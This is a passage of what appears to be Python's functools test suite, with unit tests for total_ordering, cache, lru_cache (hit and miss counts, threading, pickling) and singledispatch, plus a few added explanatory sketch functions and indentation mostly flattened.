def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
def test_total_ordering_for_metaclasses_issue_44605(self):
@functools.total_ordering
class SortableMeta(type):
def __new__(cls, name, bases, ns):
return super().__new__(cls, name, bases, ns)
def __lt__(self, other):
if not isinstance(other, SortableMeta):
pass
return self.__name__ < other.__name__
def __eq__(self, other):
if not isinstance(other, SortableMeta):
pass
return self.__name__ == other.__name__
class B(metaclass=SortableMeta):
pass
class A(metaclass=SortableMeta):
pass
self.assertTrue(A < B)
self.assertFalse(A > B)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
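# Editor's note: illustrative sketch (not part of the original suite). Given
# __eq__ and one rich comparison, total_ordering fills in the remaining
# comparison methods, which is what the Orderable_LT helper above relies on.
def _total_ordering_sketch():
    import functools
    @functools.total_ordering
    class Version:
        def __init__(self, n):
            self.n = n
        def __eq__(self, other):
            return self.n == other.n
        def __lt__(self, other):
            return self.n < other.n
    assert Version(1) <= Version(2)     # __le__ derived from __lt__ and __eq__
    assert Version(2) >= Version(2)     # __ge__ derived as well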
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
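# Editor's note: illustrative sketch (not part of the original suite).
# functools.cache is lru_cache(maxsize=None): an unbounded memoizing wrapper
# whose statistics are visible through cache_info(), as TestCache checks above.
def _cache_sketch():
    import functools
    @functools.cache
    def factorial(n):
        return n * factorial(n - 1) if n else 1
    factorial(10)                       # populates entries for 0..10
    factorial(5)                        # served entirely from the cache
    assert factorial.cache_info().hits >= 1
    assert factorial.cache_info().maxsize is None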
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This caused the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_cache_typed_is_not_recursive(self):
cached = self.module.lru_cache(typed=True)(repr)
self.assertEqual(cached(1), '1')
self.assertEqual(cached(True), 'True')
self.assertEqual(cached(1.0), '1.0')
self.assertEqual(cached(0), '0')
self.assertEqual(cached(False), 'False')
self.assertEqual(cached(0.0), '0.0')
self.assertEqual(cached((1,)), '(1,)')
self.assertEqual(cached((True,)), '(1,)')
self.assertEqual(cached((1.0,)), '(1,)')
self.assertEqual(cached((0,)), '(0,)')
self.assertEqual(cached((False,)), '(0,)')
self.assertEqual(cached((0.0,)), '(0,)')
class T(tuple):
pass
self.assertEqual(cached(T((1,))), '(1,)')
self.assertEqual(cached(T((True,))), '(1,)')
self.assertEqual(cached(T((1.0,))), '(1,)')
self.assertEqual(cached(T((0,))), '(0,)')
self.assertEqual(cached(T((False,))), '(0,)')
self.assertEqual(cached(T((0.0,))), '(0,)')
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
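# Editor's note: illustrative sketch (not part of the original suite)
# summarising the bounded-cache behaviour exercised in TestLRU: once maxsize
# entries are cached, the least recently used entry is evicted.
def _lru_cache_sketch():
    import functools
    @functools.lru_cache(maxsize=2)
    def double(x):
        return 2 * x
    double(1); double(2); double(3)     # three misses; 1 is evicted when 3 arrives
    double(3); double(2)                # two hits
    hits, misses, maxsize, currsize = double.cache_info()
    assert (hits, misses, maxsize, currsize) == (2, 3, 2, 2)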
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
